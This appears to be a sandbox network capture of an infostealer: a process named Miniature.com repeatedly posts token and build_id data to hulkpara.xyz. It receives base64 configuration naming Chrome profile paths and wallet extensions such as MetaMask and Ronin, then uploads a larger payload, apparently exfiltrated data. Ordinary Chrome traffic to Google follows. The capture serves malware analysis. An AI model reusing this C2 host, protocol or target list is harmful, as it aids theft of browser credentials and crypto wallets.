                                                                                                                                                                                                                                                                                          2024-12-19 07:13:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:23 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:23 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 7c 31 7c 31 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 3a1|1|1|1|cf24ca26af1dc229937e6396f212b71d|1|1|1|1|0|50000|10


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          3192.168.2.74971394.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:24 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GVA1VKFU3EKF3E37900Z
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------GVA1VKFU3EKF3E37900ZCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:25 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:25 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          4192.168.2.74971494.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:27 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----UKFK6PZ58YM7QQ1V3OP8
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:27 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 46 4b 36 50 5a 35 38 59 4d 37 51 51 31 56 33 4f 50 38 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------UKFK6PZ58YM7QQ1V3OP8Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------UKFK6PZ58YM7QQ1V3OP8Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------UKFK6PZ58YM7QQ1V3OP8Cont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:27 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:28 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          5192.168.2.74971594.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:29 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----0R1DBSRQQ9RQIE37Y5F3
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:29 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 30 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 30 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 30 52 31 44 42 53 52 51 51 39 52 51 49 45 33 37 59 35 46 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------0R1DBSRQQ9RQIE37Y5F3Content-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------0R1DBSRQQ9RQIE37Y5F3Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------0R1DBSRQQ9RQIE37Y5F3Cont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:30 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:30 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          6192.168.2.74971694.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:31 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----XTJEKXB16P8YU3ECBIWB
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 6365
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:31 UTC6365OUTData Raw: 2d 2d 2d 2d 2d 2d 58 54 4a 45 4b 58 42 31 36 50 38 59 55 33 45 43 42 49 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 58 54 4a 45 4b 58 42 31 36 50 38 59 55 33 45 43 42 49 57 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 58 54 4a 45 4b 58 42 31 36 50 38 59 55 33 45 43 42 49 57 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------XTJEKXB16P8YU3ECBIWBContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------XTJEKXB16P8YU3ECBIWBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------XTJEKXB16P8YU3ECBIWBCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:32 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:32 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:32 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          7192.168.2.749722172.217.19.2284438060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:35 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:36 GMT
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-oI_O0Y18oRWsguAsH1zvAw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC124INData Raw: 33 34 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 61 72 69 65 73 20 64 61 69 6c 79 20 68 6f 72 6f 73 63 6f 70 65 20 74 6f 64 61 79 22 2c 22 68 65 6c 6c 64 69 76 65 72 73 20 6b 69 6c 6c 7a 6f 6e 65 20 63 72 6f 73 73 6f 76 65 72 22 2c 22 70 65 6e 6e 20 73 74 61 74 65 20 6e 65 62 72 61 73 6b 61 20 76 6f 6c 6c 65 79 62 61 6c 6c 20 67 61 6d 65 22 2c 22 73 6f 75 6e 64 68 6f 75
                                                                                                                                                                                                                                                                                          Data Ascii: 349)]}'["",["aries daily horoscope today","helldivers killzone crossover","penn state nebraska volleyball game","soundhou
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC724INData Raw: 6e 64 20 61 69 20 73 74 6f 63 6b 22 2c 22 77 65 73 74 65 72 6e 20 77 61 73 68 69 6e 67 74 6f 6e 20 70 6f 77 65 72 20 6f 75 74 61 67 65 73 22 2c 22 61 75 62 75 72 6e 20 6a 6f 68 6e 69 20 62 72 6f 6f 6d 65 20 69 6e 6a 75 72 79 22 2c 22 61 6e 6f 72 61 20 73 74 72 65 61 6d 69 6e 67 20 64 61 74 65 22 2c 22 68 6f 6e 64 61 20 6e 69 73 73 61 6e 20 6d 65 72 67 65 72 20 74 61 6c 6b 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63
                                                                                                                                                                                                                                                                                          Data Ascii: nd ai stock","western washington power outages","auburn johni broome injury","anora streaming date","honda nissan merger talks"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2Vhc
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          8192.168.2.749724172.217.19.2284438060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:35 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          9192.168.2.749725172.217.19.2284438060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-19 07:13:36 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:13:36 GMT
                                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
